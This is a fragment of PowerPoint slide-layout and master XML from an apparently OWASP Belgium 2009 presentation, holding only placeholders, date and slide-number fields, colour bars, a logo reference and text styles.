            <a:ext cx="4038600" cy="48117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312863"/>
            <a:ext cx="4038600" cy="48117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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{F461D55E-9986-4DC0-B986-6ADDFB0284F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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{53CA48D7-8A49-45B5-9E86-8D703A94AE8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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9D86484C-CAA7-483D-B444-AEFC2703759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77813583-1E88-4A9B-B143-1A823A429E9C}"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5B35119-3283-4696-B695-6A5C635F48C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514D2A0-B8CB-4BFE-B6F5-7E8F495E3B16}"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
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E8A5D24D-ED84-4F05-8F8E-A890FD0EEC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08A0EE9-3D3E-4A2C-A8D1-504A74AADE07}"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68288"/>
            <a:ext cx="2058987" cy="5856287"/>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0850" y="268288"/>
            <a:ext cx="6024563"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
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C38119C6-1970-4758-BEC4-1B60429A161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lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0E202CC9-9485-4E21-9921-850B7E69B581}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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0F46FE-C0D1-413E-AC97-F4F614C6B724}"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fld id="{4D63D7DA-7920-4A41-863D-0C7EE6704E9B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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60E1AB-6872-44E3-95AF-50A118EE69E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2E98C7D-CC53-4606-A7C1-218B1608443B}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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3A7C1D-47E0-40E0-8612-6A3BB21026F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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{37FF1D65-890A-4C26-9B8F-9C07F9D59178}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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4CA9FF-61E5-424C-B81C-61645EB70B7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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{997A31BC-0055-45FC-9ED0-F1F929A219F4}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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9B1D3A3-FA19-4522-A1C4-AA826BE16A0F}"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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3F3D414D-6464-4FFE-A6B8-638FA798F2C2}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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3D200A4-138C-44EC-87FF-4E2887AB4B9C}"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EA82126-04CB-4A6F-8A1C-6C2B9901B611}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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9B238F4-9504-48A1-AF00-A87D46CE89E0}"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796C6B-3970-4339-BA53-70CF3954668E}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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D1E1D2-EE6E-46E3-9FC4-2001E828369F}"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0C6350-EFAF-4833-898E-F5BA5785A2F5}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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A562A03-3C7A-443E-8D24-6BEFA67D87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60EB3E8-D77D-411E-AC7E-BF4912DAAA20}"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fld id="{D14A5CC1-7461-444C-ACCE-3742FEF6B0BD}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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897D12-FE61-46A2-A7F9-FABB9FC33255}"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fld id="{5FE5963C-1C10-4908-BF46-E082C15E9C6D}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>11/30/2009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650B7C-8DDF-4030-8D98-885C2624EDF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93838"/>
            <a:ext cx="40386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93838"/>
            <a:ext cx="40386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3DB41E9D-26CD-4C60-A8DB-0DD004959E7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4F23896D-6D78-41B6-A9AA-057A800A49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5FA5E878-7E66-4831-BE6A-85BFBDE31F4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9C62C8A-5A77-47CE-AAE1-9315B8EB2B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655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493838"/>
            <a:ext cx="4038600" cy="46783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93838"/>
            <a:ext cx="4038600" cy="46783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D6862F09-8F8D-4319-9658-10B0E3F22B0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6553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493838"/>
            <a:ext cx="8229600" cy="4678362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" noProof="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{C37A9B0B-CF80-401A-BCFB-C044983CD0C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1.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0850" y="268288"/>
            <a:ext cx="6553200" cy="852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312863"/>
            <a:ext cx="8229600" cy="4811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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6711950"/>
            <a:ext cx="9144000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2054" name="Picture 9" descr="owasp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId11" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="6248400"/>
            <a:ext cx="381000" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8585200" y="6308725"/>
            <a:ext cx="406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rgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{933D1409-0DEA-42B2-9731-34EE641F457F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5232400" y="6270625"/>
            <a:ext cx="2844800" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Belgium 2009</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2057" name="Picture 13"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm rot="2700000">
            <a:off x="8509000" y="5969000"/>
            <a:ext cx="431800" cy="266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4"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Lst>
  <p:hf hdr="0" ftr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr lang="en-US" sz="2800" b="1" dirty="0">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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
        <a:buChar char="&lt;"/>
        <a:defRPr lang="en-US" sz="2800" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
        <a:buChar char="4"/>
        <a:defRPr lang="en-US" sz="2400" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr lang="en-US" sz="2000" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr lang="en-US" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr lang="en-US" dirty="0">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>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0850" y="268288"/>
            <a:ext cx="6553200" cy="852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312863"/>
            <a:ext cx="8229600" cy="4811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1" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1032" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6711950"/>
            <a:ext cx="9144000" cy="152400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="336699"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3078" name="Picture 9" descr="owasp"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8077200" y="6248400"/>
            <a:ext cx="381000" cy="349250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8585200" y="6308725"/>
            <a:ext cx="406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rgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{587286AA-D14D-40FC-97D9-1D39EC4E050C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5232400" y="6270625"/>
            <a:ext cx="2844800" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Belgium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="969696"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2009</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3081" name="Picture 13"/>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rot="2700000">
            <a:off x="8509000" y="5969000"/>
            <a:ext cx="431800" cy="266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hf hdr="0" ftr="0" dt="0"/>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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
